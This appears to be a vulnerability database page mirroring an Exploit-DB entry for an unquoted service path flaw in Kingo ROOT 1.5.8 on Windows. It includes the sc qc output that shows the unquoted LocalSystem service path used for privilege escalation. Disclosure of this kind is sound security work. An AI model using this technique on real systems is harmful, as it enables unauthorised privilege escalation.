Kingo ROOT 1.5.8 - Unquoted Service Path

vendor:

Kingo ROOT

by:

Anish Feroz (ZEROXINN)

7.5

CVSS

HIGH

Unquoted Service Path

428

CWE

Product Name: Kingo ROOT

Affected Version From: 1.5.2008

Affected Version To: 1.5.2008

Patch Exists: NO

Related CWE:

CPE: a:kingo:root:1.5.8

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Kingo ROOT 1.5.8 – Unquoted Service Path

The Kingo ROOT 1.5.8 software has an unquoted service path vulnerability. This allows an attacker to gain elevated privileges by placing a malicious executable in a directory with a space in its name, which the service will attempt to execute.

Mitigation:

To mitigate this vulnerability, the vendor should update the service configuration to include quotes around the executable path. Users should ensure they have the latest version of the software installed and keep their operating system up to date.

Source

Exploit-DB raw data:

#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro

-------------Discovering Unquoted Path--------------

C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Anish>systeminfo

Host Name:                 DESKTOP-UT7E7CF
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045